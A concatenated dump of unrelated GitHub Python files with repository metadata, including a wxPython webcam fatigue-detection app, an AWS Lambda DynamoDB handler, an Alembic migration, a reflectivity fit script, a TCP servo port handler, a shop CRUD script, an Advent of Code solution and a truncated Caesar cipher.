path_visitors_save_dir + '/' + str(now_time) + str(\r\n name_namelist[k]) + '.jpg')\r\n else:\r\n print('重复,未保存!')\r\n\r\n else:\r\n # 播放无法识别音效\r\n # playsound('D:/myworkspace/JupyterNotebook/People/music/sorry.wav')\r\n print(\"Unknown person\")\r\n # -----保存图片-------\r\n # -----------筛选出人脸并保存到visitor文件夹------------\r\n for i, d in enumerate(faces):\r\n x1 = d.top() if d.top() > 0 else 0\r\n y1 = d.bottom() if d.bottom() > 0 else 0\r\n x2 = d.left() if d.left() > 0 else 0\r\n y2 = d.right() if d.right() > 0 else 0\r\n face = im_rd[x1:y1, x2:y2]\r\n size = 64\r\n face = cv2.resize(face, (size, size))\r\n # 要存储visitor-》unknown人脸图像文件的路径\r\n path_visitors_save_dir = \"G:/pycharm project/python project/face detecting/pictures/people/visitors/unknown\"\r\n # 存储格式:2019-06-24-14-33-40unknown.jpg\r\n now_time = time.strftime(\"%Y-%m-%d-%H-%M-%S\", time.localtime())\r\n # print(save_name)\r\n # 本次图片保存的完整url\r\n save_path = path_visitors_save_dir + '/' + str(now_time) + 'unknown.jpg'\r\n cv2.imwrite(save_path, face)\r\n print('新存储:' + path_visitors_save_dir + '/' + str(now_time) + 'unknown.jpg')\r\n # 在人脸框下面写人脸名字\r\n # write names under rectangle\r\n for i in range(len(faces)):\r\n cv2.putText(im_rd, name_namelist[i], pos_namelist[i], font, 0.8, (0, 255, 255), 1,cv2.LINE_AA)\r\n\r\n print(\"Faces in camera now:\", name_namelist, \"\\n\")\r\n # 将脸部特征信息转换为数组array的格式\r\n shape = face_utils.shape_to_np(shape)\r\n \"\"\"\r\n 打哈欠\r\n \"\"\"\r\n if self.yawn_checkBox1.GetValue() == True:\r\n # 嘴巴坐标\r\n mouth = shape[mStart:mEnd]\r\n # 打哈欠\r\n mar = self.mouth_aspect_ratio(mouth)\r\n # 使用cv2.convexHull获得凸包位置,使用drawContours画出轮廓位置进行画图操作\r\n mouthHull = cv2.convexHull(mouth)\r\n cv2.drawContours(im_rd, [mouthHull], -1, (0, 255, 0), 1)\r\n # 同理,判断是否打哈欠\r\n if mar > self.MAR_THRESH: # 张嘴阈值0.5\r\n self.mCOUNTER += 1\r\n else:\r\n # 如果连续3次都小于阈值,则表示打了一次哈欠\r\n if self.mCOUNTER >= self.MOUTH_AR_CONSEC_FRAMES: # 阈值:3\r\n self.mTOTAL += 1\r\n # 显示\r\n cv2.putText(im_rd, \"Yawning!\", (10, 60), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\r\n self.m_textCtrl3.AppendText(\r\n time.strftime('%Y-%m-%d %H:%M ', time.localtime()) + u\"yawn!!!\\n\")\r\n # 重置嘴帧计数器\r\n self.mCOUNTER = 0\r\n cv2.putText(im_rd, \"COUNTER: {}\".format(self.mCOUNTER), (150, 60), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.7, (0, 0, 255), 2)\r\n cv2.putText(im_rd, \"MAR: {:.2f}\".format(mar), (300, 60), cv2.FONT_HERSHEY_SIMPLEX, 0.7,\r\n (0, 0, 255), 2)\r\n cv2.putText(im_rd, \"Yawning: {}\".format(self.mTOTAL), (450, 60), cv2.FONT_HERSHEY_SIMPLEX, 0.7,\r\n (255, 255, 0), 2)\r\n else:\r\n pass\r\n \"\"\"\r\n 眨眼\r\n \"\"\"\r\n if self.blink_checkBox2.GetValue() == True:\r\n # 提取左眼和右眼坐标\r\n leftEye = shape[lStart:lEnd]\r\n rightEye = shape[rStart:rEnd]\r\n # 构造函数计算左右眼的EAR值,使用平均值作为最终的EAR\r\n leftEAR = self.eye_aspect_ratio(leftEye)\r\n rightEAR = self.eye_aspect_ratio(rightEye)\r\n ear = (leftEAR + rightEAR) / 2.0\r\n leftEyeHull = cv2.convexHull(leftEye)\r\n rightEyeHull = cv2.convexHull(rightEye)\r\n # 使用cv2.convexHull获得凸包位置,使用drawContours画出轮廓位置进行画图操作\r\n cv2.drawContours(im_rd, [leftEyeHull], -1, (0, 255, 0), 1)\r\n cv2.drawContours(im_rd, [rightEyeHull], -1, (0, 255, 0), 1)\r\n # 循环,满足条件的,眨眼次数+1\r\n if ear < self.EYE_AR_THRESH: # 眼睛长宽比:0.2\r\n self.COUNTER += 1\r\n\r\n else:\r\n # 如果连续3次都小于阈值,则表示进行了一次眨眼活动\r\n if self.COUNTER >= self.EYE_AR_CONSEC_FRAMES: # 阈值:3\r\n self.TOTAL += 1\r\n self.m_textCtrl3.AppendText(\r\n time.strftime('%Y-%m-%d %H:%M ', time.localtime()) + u\"blink!!!\\n\")\r\n # 重置眼帧计数器\r\n self.COUNTER = 0\r\n # 第十四步:进行画图操作,同时使用cv2.putText将眨眼次数进行显示\r\n cv2.putText(im_rd, \"Faces: {}\".format(len(faces)), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7,\r\n (0, 0, 255), 2)\r\n cv2.putText(im_rd, \"COUNTER: {}\".format(self.COUNTER), (150, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7,\r\n (0, 0, 255), 2)\r\n cv2.putText(im_rd, \"EAR: {:.2f}\".format(ear), (300, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7,\r\n (0, 0, 255), 2)\r\n cv2.putText(im_rd, \"Blinks: {}\".format(self.TOTAL), (450, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7,\r\n (255, 255, 0), 2)\r\n else:\r\n pass\r\n \"\"\"\r\n 瞌睡点头\r\n \"\"\"\r\n if self.nod_checkBox7.GetValue() == True:\r\n # 获取头部姿态\r\n reprojectdst, euler_angle = self.get_head_pose(shape)\r\n har = euler_angle[0, 0] # 取pitch旋转角度\r\n if har > self.HAR_THRESH: # 点头阈值0.3\r\n self.hCOUNTER += 1\r\n else:\r\n # 如果连续3次都小于阈值,则表示瞌睡点头一次\r\n if self.hCOUNTER >= self.NOD_AR_CONSEC_FRAMES: # 阈值:3\r\n self.hTOTAL += 1\r\n self.m_textCtrl3.AppendText(\r\n time.strftime('%Y-%m-%d %H:%M ', time.localtime()) + u\"sleepy nod!!! \\n\")\r\n # 重置点头帧计数器\r\n self.hCOUNTER = 0\r\n # 绘制正方体12轴(视频流尺寸过大时,reprojectdst会超出int范围,建议压缩检测视频尺寸)\r\n # for start, end in self.line_pairs:\r\n # im_rd = im_rd.astype(int)\r\n # print(reprojectdst)[start]\r\n # cv2.line(im_rd, reprojectdst[start], reprojectdst[end], (0, 0, 255))\r\n # 显示角度结果\r\n cv2.putText(im_rd, \"X: \" + \"{:7.2f}\".format(euler_angle[0, 0]), (10, 90),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 255, 0), thickness=2) # GREEN\r\n cv2.putText(im_rd, \"Y: \" + \"{:7.2f}\".format(euler_angle[1, 0]), (150, 90),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.75, (255, 0, 0), thickness=2) # BLUE\r\n cv2.putText(im_rd, \"Z: \" + \"{:7.2f}\".format(euler_angle[2, 0]), (300, 90),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 0, 255), thickness=2) # RED\r\n cv2.putText(im_rd, \"Nod: {}\".format(self.hTOTAL), (450, 90), cv2.FONT_HERSHEY_SIMPLEX, 0.7,\r\n (255, 255, 0), 2)\r\n else:\r\n pass\r\n\r\n print('Real-time mouth aspect ratio:{:.2f} '.format(mar) + \"\\tYawn or not:\" + str([False, True][mar > self.MAR_THRESH]))\r\n print('Real-time eye aspect ratio:{:.2f} '.format(ear) + \"\\tBlink or not:\" + str([False, True][self.COUNTER >= 1]))\r\n else:\r\n # 没有检测到人脸\r\n self.oCOUNTER += 1\r\n cv2.putText(im_rd, \"No Face\", (20, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 3, cv2.LINE_AA)\r\n if self.oCOUNTER >= self.OUT_AR_CONSEC_FRAMES_check:\r\n self.m_textCtrl3.AppendText(time.strftime('%Y-%m-%d %H:%M ', time.localtime()) + u\"absence!!!\\n\")\r\n self.oCOUNTER = 0\r\n\r\n # 确定疲劳提示:眨眼50次,打哈欠15次,瞌睡点头30次\r\n time_end = time.time()\r\n timecost = time_end - time_start\r\n print(timecost)\r\n if ((self.TOTAL >= 50 or self.mTOTAL >= 15 or self.hTOTAL >= 30) and (timecost < 200)) or (timecost>14400):\r\n cv2.putText(im_rd, \"SLEEP!!!\", (100, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 3)\r\n\r\n # self.m_textCtrl3.AppendText(u\"疲劳\")\r\n\r\n # opencv中imread的图片内部是BGR排序,wxPython的StaticBitmap需要的图片是RGB排序,不转换会出现颜色变换\r\n height, width = im_rd.shape[:2]\r\n image1 = cv2.cvtColor(im_rd, cv2.COLOR_BGR2RGB)\r\n pic = wx.Bitmap.FromBuffer(width, height, image1)\r\n # 显示图片在panel上:\r\n self.bmp.SetBitmap(pic)\r\n\r\n # 释放摄像头\r\n self.cap.release()\r\n\r\n def update(self,event):\r\n people = os.listdir(path_images_from_camera)\r\n people.sort()\r\n\r\n # with open(\"D:/myworkspace/JupyterNotebook/People/feature/features2_all.csv\", \"w\", newline=\"\") as csvfile:\r\n with open(\"G:/pycharm project/python project/face detecting/1111.csv\", \"w\", newline=\"\") as csvfile:\r\n writer = csv.writer(csvfile)\r\n for person in people:\r\n print(\"##### \" + person + \" #####\")\r\n # Get the mean/average features of face/personX, it will be a list with a length of 128D\r\n features_mean_personX = return_features_mean_personX(path_images_from_camera + person)\r\n writer.writerow(features_mean_personX)\r\n print(\"特征均值 / The mean of features:\", list(features_mean_personX))\r\n print('\\n')\r\n # print(\"所有录入人脸数据存入 / Save all the features of faces registered into: D:/myworkspace/JupyterNotebook/People/feature/features_all2.csv\")\r\n print(\r\n \"所有录入人脸数据存入 / Save all the features of faces registered into: G:/pycharm project/python project/face detecting/1111.csv\")\r\n\r\n # import _thread\r\n # # 创建子线程,按钮调用这个方法,\r\n # _thread.start_new_thread(self._learning_face, (event,))\r\n def upload(self,event):\r\n\r\n dlg = wx.MessageDialog(None, u'Is this your first time using it?', u'Operating hints',wx.YES_NO | wx.ICON_QUESTION)\r\n if (dlg.ShowModal() == wx.ID_YES):\r\n # dlg = wx.TextEntryDialog()\r\n # dlg.Destroy()\r\n # dlg = wx.TextEntryDialog(None,u'Please create a folder named \"number\"+\"letter\", for instance:\"1czx')\r\n folder_name = input('Please create a folder named \"number\"+\"letter\", for instance:\"1czx\\n')\r\n path = r'G:\\pycharm project\\python project\\face detecting\\pictures\\people' + '/' +folder_name\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n print('create folder successfully')\r\n else:\r\n print('fail to create the folder,it is exist')\r\n dlg.Destroy() # 取消弹窗\r\n else:\r\n dialog = wx.FileDialog(self, u\"choose photos\", os.getcwd(), '', wildcard=\"(*.jpg)|*.jpg\",\r\n style=wx.FD_OPEN | wx.FD_CHANGE_DIR)\r\n if dialog.ShowModal() == wx.ID_OK:\r\n path = str(dialog.GetPath()) # 更新全局变量路径\r\n filepath = os.path.basename(path)\r\n # print(path,filepath)\r\n folder_name = input('Please choose your folder named \"number\"+\"letter\", for instance:\"1czx\\n')\r\n path1 = r'G:\\pycharm project\\python project\\face detecting\\pictures\\people' + '/' + folder_name + '/' + filepath\r\n if not os.path.exists(path1):\r\n shutil.copyfile(dialog.GetPath(), path1)\r\n print('upload photo successfully')\r\n else:\r\n print('fail to create the folder,it is exist')\r\n\r\n\r\n #os.makedirs(path)\r\n # 选择文件夹对话框窗口\r\n # dialog = wx.FileDialog(self, u\"choose videos\", os.getcwd(), '', wildcard=\"(*.mp4)|*.mp4\",\r\n # style=wx.FD_OPEN | wx.FD_CHANGE_DIR)\r\n # if dialog.ShowModal() == wx.ID_OK:\r\n # # 如果确定了选择的文件夹,将文件夹路径写到m_textCtrl3控件\r\n # # self.m_textCtrl3.SetValue(u\"文件路径:\" + dialog.GetPath() + \"\\n\")\r\n # # self.VIDEO_STREAM = str(dialog.GetPath()) # 更新全局变量路径\r\n\r\n # dialog.Destroy\r\n \"\"\"使用多线程,子线程运行后台的程序,主线程更新前台的UI,这样不会互相影响\"\"\"\r\n # import _thread\r\n # # 创建子线程,按钮调用这个方法,\r\n # _thread.start_new_thread(self._learning_face, (event,))\r\n\r\n\r\n def camera_on(self, event):\r\n \"\"\"使用多线程,子线程运行后台的程序,主线程更新前台的UI,这样不会互相影响\"\"\"\r\n import _thread\r\n # 创建子线程,按钮调用这个方法,\r\n _thread.start_new_thread(self._learning_face, (event,))\r\n\r\n def cameraid_choice(self, event):\r\n # 摄像头编号\r\n cameraid = int(event.GetString()[-1]) # 截取最后一个字符\r\n if cameraid == 0:\r\n self.m_textCtrl3.AppendText(u\"Prepare to open the local camera!!!\\n\")\r\n if cameraid == 1 or cameraid == 2:\r\n self.m_textCtrl3.AppendText(u\"Prepart to open the external camera!!!\\n\")\r\n self.VIDEO_STREAM = cameraid\r\n\r\n def vedio_on(self, event):\r\n if self.CAMERA_STYLE == True: # 释放摄像头资源\r\n # 弹出关闭摄像头提示窗口\r\n dlg = wx.MessageDialog(None, u'Are you sure you want to close it?', u'Operating hints', wx.YES_NO | wx.ICON_QUESTION)\r\n if (dlg.ShowModal() == wx.ID_YES):\r\n self.cap.release() # 释放摄像头\r\n self.bmp.SetBitmap(wx.Bitmap(self.image_cover)) # 封面\r\n dlg.Destroy() # 取消弹窗\r\n # 选择文件夹对话框窗口\r\n dialog = wx.FileDialog(self, u\"choose videos\", os.getcwd(), '', wildcard=\"(*.mp4)|*.mp4\",\r\n style=wx.FD_OPEN | wx.FD_CHANGE_DIR)\r\n if dialog.ShowModal() == wx.ID_OK:\r\n # 如果确定了选择的文件夹,将文件夹路径写到m_textCtrl3控件\r\n self.m_textCtrl3.SetValue(u\"文件路径:\" + dialog.GetPath() + \"\\n\")\r\n self.VIDEO_STREAM = str(dialog.GetPath()) # 更新全局变量路径\r\n dialog.Destroy\r\n \"\"\"使用多线程,子线程运行后台的程序,主线程更新前台的UI,这样不会互相影响\"\"\"\r\n import _thread\r\n # 创建子线程,按钮调用这个方法,\r\n _thread.start_new_thread(self._learning_face, (event,))\r\n\r\n def AR_CONSEC_FRAMES(self, event):\r\n self.m_textCtrl3.AppendText(u\"设置疲劳间隔为:\\t\" + event.GetString() + \"秒\\n\")\r\n self.AR_CONSEC_FRAMES_check = int(event.GetString())\r\n\r\n def OUT_AR_CONSEC_FRAMES(self, event):\r\n self.m_textCtrl3.AppendText(u\"设置脱岗间隔为:\\t\" + event.GetString() + \"秒\\n\")\r\n self.OUT_AR_CONSEC_FRAMES_check = int(event.GetString())\r\n\r\n def off(self, event):\r\n \"\"\"关闭摄像头,显示封面页\"\"\"\r\n self.cap.release()\r\n self.bmp.SetBitmap(wx.Bitmap(self.image_cover))\r\n\r\n def OnClose(self, evt):\r\n \"\"\"关闭窗口事件函数\"\"\"\r\n dlg = wx.MessageDialog(None, u'Are you sure you want to close it?', u'Operating hints', wx.YES_NO | wx.ICON_QUESTION)\r\n if (dlg.ShowModal() == wx.ID_YES):\r\n self.Destroy()\r\n print(\"detecting finish\")\r\n\r\n\r\nclass main_app(wx.App):\r\n \"\"\"\r\n 在OnInit() 里边申请Frame类,这样能保证一定是在app后调用,\r\n 这个函数是app执行完自己的__init__函数后就会执行\r\n \"\"\"\r\n\r\n # OnInit 方法在主事件循环开始前被wxPython系统调用,是wxpython独有的\r\n def OnInit(self):\r\n self.frame = Fatigue_detecting(parent=None, title=\"Fatigue Demo\")\r\n self.frame.Show(True)\r\n return True\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = main_app()\r\n app.MainLoop()\r\n\r\n","repo_name":"shalowdream/fatigue-detecting","sub_path":"final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":48577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38911002508","text":"import json\nimport boto3\nimport os\nfrom boto3.dynamodb.conditions import Key, Attr\n\ndynamodb = boto3.resource('dynamodb')\nENVIRONMENT = os.environ['ENVIRONMENT']\n\n\ndef getEvents(event, context):\n global dynamodb\n response_value = {\n 'statusCode': 500,\n 'body': json.dumps({\"error\": \"Internal Error\"}),\n 'headers': {\n 'Content-Type': 'application/json',\n 'Access-Control-Allow-Origin': '*'\n }\n }\n try:\n print(event[\"queryStringParameters\"])\n table = dynamodb.Table('Events_' + ENVIRONMENT)\n if event[\"queryStringParameters\"] is not None:\n if 'EventType' in event[\"queryStringParameters\"]:\n data = table.scan(\n FilterExpression=Attr(\"EventType\").eq(event[\"queryStringParameters\"][\"EventType\"]))\n else:\n data = table.scan()\n\n response_value = {\n 'statusCode': 200,\n 'body': json.dumps(data['Items']),\n 'headers': {\n 'Content-Type': 'application/json',\n 'Access-Control-Allow-Origin': '*'\n }\n }\n except Exception as e:\n print(e)\n\n return response_value\n","repo_name":"TheRealSeat/Capstone","sub_path":"server/lambdas/events/get/getEvents.py","file_name":"getEvents.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"95886992","text":"\"\"\"empty message\n\nRevision ID: ee440e418780\nRevises: \nCreate Date: 2022-09-06 21:03:17.069513\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ee440e418780'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('first_name', sa.String(length=20), nullable=True),\n sa.Column('last_name', sa.String(length=20), nullable=True),\n sa.Column('email', sa.String(length=120), nullable=True),\n sa.Column('password', sa.String(), nullable=True),\n sa.Column('created_on', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_user_email'), 'user', ['email'], unique=True)\n op.create_index(op.f('ix_user_first_name'), 'user', ['first_name'], unique=False)\n op.create_index(op.f('ix_user_last_name'), 'user', ['last_name'], unique=False)\n op.create_table('toolbox',\n sa.Column('toolbox_id', sa.Integer(), nullable=False),\n sa.Column('userid', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['userid'], ['user.id'], ),\n sa.PrimaryKeyConstraint('toolbox_id')\n )\n op.create_table('tool',\n sa.Column('tool_id', sa.Integer(), nullable=False),\n sa.Column('toolboxid', sa.Integer(), nullable=True),\n sa.Column('tool_name', sa.String(length=20), nullable=True),\n sa.Column('tool_brand', sa.String(length=20), nullable=True),\n sa.Column('quantity', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['toolboxid'], ['toolbox.toolbox_id'], ),\n sa.PrimaryKeyConstraint('tool_id')\n )\n op.create_index(op.f('ix_tool_tool_brand'), 'tool', ['tool_brand'], unique=False)\n op.create_index(op.f('ix_tool_tool_name'), 'tool', ['tool_name'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_tool_tool_name'), table_name='tool')\n op.drop_index(op.f('ix_tool_tool_brand'), table_name='tool')\n op.drop_table('tool')\n op.drop_table('toolbox')\n op.drop_index(op.f('ix_user_last_name'), table_name='user')\n op.drop_index(op.f('ix_user_first_name'), table_name='user')\n op.drop_index(op.f('ix_user_email'), table_name='user')\n op.drop_table('user')\n # ### end Alembic commands ###\n","repo_name":"ag4sm/Toolbox","sub_path":"migrations/versions/ee440e418780_.py","file_name":"ee440e418780_.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33509536380","text":"# Example of neutron reflectivity dataset refinement from a\n# thick SiO2 layer at the air/Si interface\n# Measurments acquired at D17 instrument (ILL, Grenoble)\nfrom anaklasis import ref\n\nproject='SiO_fit'\nin_file=['D17_SiO.dat']\nunits=['A']\n\nfit_mode=0 # 0 is for linear, 1 is for log\nfit_weight=[1]\nmethod = 'mcmc' # Markov Chain Monte Carlo Sampling\n\nresolution=[-1] # pointwise resolution\n\nmodel = [\n\t# Re_sld Im_sld thk rough solv description\n\t[ 0.0, 0.0, 0, 'p0', 0.0, 'Air'],\n\t[ 'p1', 0.0, 'p2', 'p3', 0.0, 'SiOx'],\n\t[ 2.07e-6, 0.0, 0, 0.0, 0.0, 'Si'],\n\t]\n\nsystem=[model]\npatches=[1.0]\n\nglobal_param = [\n # param min max description type\n ['p0', 0, 20, 'air/SiOx_roughness','uniform'],\n ['p1', 3.3e-6, 3.7e-6, 'SiOx_sld','uniform'],\n ['p2', 0, 2000, 'SiOx_thickness','uniform'],\n ['p3', 0, 30, 'SiOx/Si_roughness','uniform'],\n\t]\n\nmulti_param = []\nconstraints = []\n\nbackground = [\n\t[0.0e-11,1.0e-5,'uniform'],\n\t]\n\nscale = [\n\t[0.8,1.1,'uniform'],\n\t]\n\nres = ref.fit(project, in_file, units, fit_mode, fit_weight,method,resolution,patches, system,\nglobal_param,multi_param, constraints, background,scale,experror=True, plot=True,fast=True)\n","repo_name":"alexandros-koutsioumpas/anaklasis","sub_path":"examples/thick_SiO2_layer_fit.py","file_name":"thick_SiO2_layer_fit.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8667332583","text":"import time\nimport sys\n#import platform\nimport socket\n\nLATENCY_TIMER = 16\n\nSOCKET_TIMEOUT = .100\n\n\nclass TCPPortHandler(object):\n def __init__(self, port):\n self.is_open = False\n self.packet_timeout = 0.0\n self.tx_time_per_byte = 0.0\n\n self.is_using = False\n self.socket = None\n self.port = port\n\n\n def openPort(self):\n print(\"Opening \",self.port)\n try:\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.settimeout(SOCKET_TIMEOUT)\n self.socket.connect(self.port)\n self.is_open = True\n return True\n except Exception as e:\n print (\"Port Open Failed with Exception: %s\"%(e))\n del self.socket\n self.socket = None\n self.is_open = False\n\n def closePort(self):\n if(self.is_open):\n self.socket.close()\n del self.socket\n self.socket = None\n self.is_open = False\n\n def readPort(self, length):\n if(not self.is_open):\n return \"\"\n try:\n return self.socket.recv(length)\n except Exception as ex:\n #print(\"Reading...\")\n #print(ex)\n # self.closePort()\n return \"\"\n\n def writePort(self, packet):\n if(not self.is_open):\n return 0\n try:\n return self.socket.send(bytes(packet))\n except Exception as ex:\n print(ex)\n return 0\n\n def clearPort(self):\n # timeout = self.socket.gettimeout()\n # try:\n # self.socket.settimeout(0)\n # self.socket.recv(1024)\n # finally:\n # self.socket.settimeout(timeout)\n pass\n\n def setPacketTimeout(self, packet_length):\n self.packet_start_time = self.getCurrentTime()\n self.packet_timeout = (self.tx_time_per_byte * packet_length) + (LATENCY_TIMER * 2.0) + 2.0\n\n def setPacketTimeoutMillis(self, msec):\n self.packet_start_time = self.getCurrentTime()\n self.packet_timeout = msec\n\n def isPacketTimeout(self):\n if self.getTimeSinceStart() > self.packet_timeout:\n self.packet_timeout = 0\n return True\n\n return False\n\n def getCurrentTime(self):\n return round(time.time() * 1000000000) / 1000000.0\n\n def getTimeSinceStart(self):\n time_since = self.getCurrentTime() - self.packet_start_time\n if time_since < 0.0:\n self.packet_start_time = self.getCurrentTime()\n\n return time_since\n ","repo_name":"Lordy2001/ServoController","sub_path":"dynamixel_sdk/tcp_port_handler.py","file_name":"tcp_port_handler.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27560300030","text":"\n\nimport sqlite3\nconnection = sqlite3.connect(\"Artikel.db\")\n\ncursor = connection.cursor()\n\n\nfor row in cursor.execute('SELECT * FROM Artikel'):\n print(row)\n\n# Artikeln anzeigen\nartikeln = [\n {'id': 1, 'artikel-nr': 10010, 'name':'Pullover', 'description':'das ist die beschreibung des Artikels','price':20.55,'status':True,'lagerbestand':100,'created_at': '2021-11-19 16:09:10','updated_at': '',},\n {'id': 2, 'artikel-nr': 10020, 'name':'Hose', 'description':'das ist die beschreibung des Artikels','price':50.99,'status':True,'lagerbestand':100,'created_at': '2021-11-19 16:09:10','updated_at': '',},\n {'id': 3, 'artikel-nr': 10030, 'name':'T-Shirt', 'description':'das ist die beschreibung des Artikels','price':20.55,'status':True,'lagerbestand':100,'created_at': '2021-11-19 16:09:10','updated_at': '',},\n {'id': 4, 'artikel-nr': 10040, 'name':'Schale', 'description':'das ist die beschreibung des Artikels','price':20.55,'status':True,'lagerbestand':100,'created_at': '2021-11-19 16:09:10','updated_at': '',},\n {'id': 5, 'artikel-nr': 10050, 'name':'Mütze', 'description':'das ist die beschreibung des Artikels','price':20.55,'status':True,'lagerbestand':100,'created_at': '2021-11-19 16:09:10','updated_at': '',},\n {'id': 6, 'artikel-nr': 10060, 'name':'Unterhose', 'description':'das ist die beschreibung des Artikels','price':20.55,'status':True,'lagerbestand':100,'created_at': '2021-11-19 16:09:10','updated_at': '',},\n {'id': 7, 'artikel-nr': 10070, 'name':'Soken', 'description':'das ist die beschreibung des Artikels','price':20.55,'status':True,'lagerbestand':100,'created_at': '2021-11-19 16:09:10','updated_at': '',},\n]\n\n#Wahrenkorb\nkorb = [\n {'id': 1, 'count':3},\n]\n\n#print(artikeln)\n\n\n\n\ndef ArtileIndex():\n #Artikel anzeigen\n print('alle Artikeln anzeigen')\n # gib mir alle daten aus der Datenbank\n for value in artikeln:\n print(artikeln[value]['name'], 'Prise: ', artikeln[value]['price'])\n\ndef ArtikelStore():\n # Artikel store\n artikel = {\n 'id': 8,\n 'artikel-nr': 10080,\n 'name':'Rosa Lutscher',\n 'description':'das ist die beschreibung des Artikels',\n 'price':20.55,\n 'status':True,\n 'lagerbestand':100,\n 'created_at': '2021-11-19 16:09:10',\n 'updated_at': '',\n }\n artikeln.append(artikel)\n\n print(artikeln)\n\n print('Artikeln eingabe speichern')\n\n#funktion aufruf der store methode\n#ArtikelStore()\n\n\ndef ArtikelEdit(id):\n # Artikel edit\n print('Artikeln bearbeiten')\n for item in artikeln:\n #print(item['id'])\n if item['id'] == id:\n print(item)\n # frontend übergabe\n\n\n# funktion methode aufrufen\n#ArtikelEdit(5)\n\n\ndef ArtikelUpdate(id,request):\n # Artikel update\n #print(request['name'])\n print('Artikeln update')\n for item in artikeln:\n #print(item['id'])\n if item['id'] == id:\n print('Vorher: ',item)\n item['name'] = request['name']\n item['description'] = request['description']\n item['price'] = request['price']\n item['lagerbestand'] = request['lagerbestand']\n\n print('Nacher: ',item)\n\n\n\n# update methode\nupdate_variable = {\n 'name':'Rote Hose',\n 'description':'ich bin der Test mit der Roten Hose',\n 'price':99.50,\n 'lagerbestand':50\n}\n\n#ArtikelUpdate(3, update_variable)\n\n\ndef ArtikelDelete(id):\n # Artikel delete\n print('Artikeln löschen')\n print(artikeln)\n for index,item in enumerate(artikeln):\n #print(item['id'])\n if item['id'] == id:\n artikeln.pop(index)\n print(index)\n\n print(repr(artikeln))\n\n#ArtikelDelete(7)\n\ndef warenKorb(id):\n # wahrenkorb erweitern\n # um einen Artikel mit der ID\n for item in artikeln:\n if item['id'] == id:\n korb.append(item)\n print(\"die artikel now gewählt\" ,korb)\n#funktions aufruf\n#warenKorb(7)\n\n\ndef artikelstand():\n print(len(korb))\n if len(korb) > 0:\n print('korb ist nicht leer')\n else:\n print('korb ist leer')\n\n\n#functions aufruf\nartikelstand()\n\n\n\n#frontend\ndef allArticls():\n for value in artikeln:\n print(value['name'],value['id'],)\n\nallArticls()","repo_name":"shivaparto/PythonOnlineShop","sub_path":"DataLayer/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33173966878","text":"#!/usr/bin/env python3\n# Advent of Code 2022: Day 2 (part 2)\n# Submission by qxtal \n\nf = open('./input.txt', 'r')\ngame_input = f.readlines()\nf.close()\n\n# This can definitely be done in a better way, but it works.\nlookup = {\n \"X\": { # Player: Needs to LOSE\n \"A\": 3 + 0, # Opponent: Rock - Player pick: Scissor\n \"B\": 1 + 0, # Opponent: Paper - Player pick: Rock\n \"C\": 2 + 0 # Opponent: Scissor - Player pick: Paper\n },\n \"Y\": { # Player: Needs to TIE\n \"A\": 1 + 3, # Opponent: Rock - Player pick: Rock\n \"B\": 2 + 3, # Opponent: Paper - Player pick: Paper\n \"C\": 3 + 3 # Opponent: Scissor - Player pick: Scissor\n },\n \"Z\": { # Player: Needs to WIN\n \"A\": 2 + 6, # Opponent: Rock - Player pick: Paper\n \"B\": 3 + 6, # Opponent: Paper - Player pick: Scissor\n \"C\": 1 + 6 # Opponent: Scissor - Player pick: Rock\n }\n}\n\nscore = 0\n\nfor line in game_input:\n opponent = line.split()[0]\n player = line.split()[1]\n score += lookup[player][opponent]\n\nprint(score)","repo_name":"qxtal/advent-of-code","sub_path":"2022/02/aoc-02b.py","file_name":"aoc-02b.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"992302676","text":"def menu():\n\tprint(\"-\"*20)\n\tprint(\"Menu: \")\n\tprint(\"1. Encode\")\n\tprint(\"2. Decode\")\n\tprint(\"-\"*20)\n\n\tchoice = int(input(\"Enter your choice: \"))\n\n\twhile choice not in (1, 2):\n\t\tchoice = int(input(\"Invalid, pls re-enter your choice: \"))\n\n\treturn choice\n\n\n\ndef cipher(char, n):\n\tnew_ascii = ord(char) + n\n\n\tif (new_ascii not in range(97, 122+1)) and (new_ascii not in range(65, 